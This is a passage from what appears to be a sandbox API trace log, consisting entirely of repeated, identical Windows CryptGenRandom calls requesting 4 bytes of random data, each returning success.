pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.581] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, 